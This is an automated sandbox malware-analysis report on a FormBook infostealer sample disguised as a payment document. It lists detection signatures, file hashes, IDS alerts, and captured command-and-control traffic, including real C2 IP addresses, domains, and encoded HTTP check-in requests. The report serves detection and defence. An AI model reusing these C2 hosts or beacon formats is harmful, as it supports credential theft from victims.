Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name:	Payment&WarantyBonds.exe (renamed file extension from bat to exe)
Original sample name:	Payment&WarantyBonds.bat
Analysis ID:	1545791
MD5:	a9da1b42f6ad80ee6085f69e6c25f49b
SHA1:	e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256:	4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Payment&WarantyBonds.exe	ReversingLabs: Detection: 45%
Source: Payment&WarantyBonds.exe	Virustotal: Detection: 40%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Payment&WarantyBonds.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: Payment&WarantyBonds.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payment&WarantyBonds.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lVlYtqLlYCJP.exe, 00000006.00000000.1945290809.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099378604.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\systeminfo.exe

Code function: 7_2_005CC500 FindFirstFileW,FindNextFileW,FindClose,

7_2_005CC500

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 4x nop then xor eax, eax		7_2_005B9E20
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_04A004DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49793 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49809 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49905 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49905 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49989 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49989 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49861 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49941 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49825 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49825 -> 103.120.80.111:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.030002059.xyz
Source:	DNS query: www.xipowerplay.xyz
Source:	DNS query: www.091210.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 20.2.249.7 20.2.249.7

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.iampinky.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cotti.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.solarand.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002059.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.xipowerplay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.stationseek.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.091210.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.adsa6c.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.simplek.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.297676.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.basicreviews.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sgland06.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /jr4j/?78=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.extrime1.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko

Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.iampinky.info
Source: global traffic	DNS traffic detected: DNS query: www.cotti.club
Source: global traffic	DNS traffic detected: DNS query: www.solarand.online
Source: global traffic	DNS traffic detected: DNS query: www.030002059.xyz
Source: global traffic	DNS traffic detected: DNS query: www.xipowerplay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.stationseek.online
Source: global traffic	DNS traffic detected: DNS query: www.091210.xyz
Source: global traffic	DNS traffic detected: DNS query: www.adsa6c.top
Source: global traffic	DNS traffic detected: DNS query: www.simplek.top
Source: global traffic	DNS traffic detected: DNS query: www.297676.com
